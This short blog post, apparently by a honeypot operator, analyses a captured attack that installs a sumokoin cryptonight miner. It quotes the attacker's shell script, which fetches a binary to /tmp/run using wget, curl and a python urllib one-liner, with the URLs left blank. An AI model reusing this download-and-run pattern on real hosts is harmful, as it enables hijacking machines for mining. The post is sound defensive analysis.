sumokoin – cryptonight

Another honeypot-entry catched my eye. First, the attack
itself was unusual because the malware download was executed
by a small python script instead of just running wget or curl:

uname -a
rm -f /tmp/run
if [ ` getconf LONG_BIT ` -eq 64 ]
then u=””
else u=””
wget -O /tmp/run
curl -o /tmp/run
python -c “import urllib;urllib.urlretrieve(‘$u’,’/tmp/run’)”

Looking into the downloaded binary one finds this miner for
the cryptocoin “sumokoin” using the “cryptonight” algorithm:


(see )

Looking into the blockchainexplorer I currently find no transactions linked
to that address, but that may be because of the nature of sumokoin ..

Tags: , ,

Leave a Reply

You must be logged in to post a comment.